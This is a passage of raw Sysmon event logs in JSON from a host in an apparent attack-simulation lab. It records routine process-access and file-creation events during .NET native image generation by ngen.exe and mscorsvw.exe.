C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.288","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-0010D78F0E00}","TargetProcessId":"3308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7684,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:03.475\r\nProcessGuid: {41C8662E-226B-5F25-0000-0010D78F0E00}\r\nProcessId: 3308\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cec-0\\System.ComponentModel.DataAnnotations.dll\r\nCreationUtcTime: 2020-08-01 08:06:03.475","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:03.475","ProcessGuid":"{41C8662E-226B-5F25-0000-0010D78F0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cec-0\\System.ComponentModel.DataAnnotations.dll","CreationUtcTime":"2020-08-01 08:06:03.475","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7685,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.507\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-001070930E00}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.507","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-001070930E00}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7686,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.507\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-001070930E00}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.507","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-001070930E00}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7687,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.522\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-001070930E00}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.522","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-001070930E00}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7688,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.632\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-0010F4960E00}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.632","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-0010F4960E00}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7689,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.632\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-0010F4960E00}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.632","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-0010F4960E00}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7690,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.632\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-0010F4960E00}\r\nTargetProcessId: 2264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.632","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-0010F4960E00}","TargetProcessId":"2264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7691,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:03.741\r\nProcessGuid: {41C8662E-226B-5F25-0000-0010F4960E00}\r\nProcessId: 2264\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\8d8-0\\System.Data.DataSetExtensions.dll\r\nCreationUtcTime: 2020-08-01 08:06:03.741","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:03.741","ProcessGuid":"{41C8662E-226B-5F25-0000-0010F4960E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\8d8-0\\System.Data.DataSetExtensions.dll","CreationUtcTime":"2020-08-01 08:06:03.741","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7692,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.772\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-00101B9B0E00}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64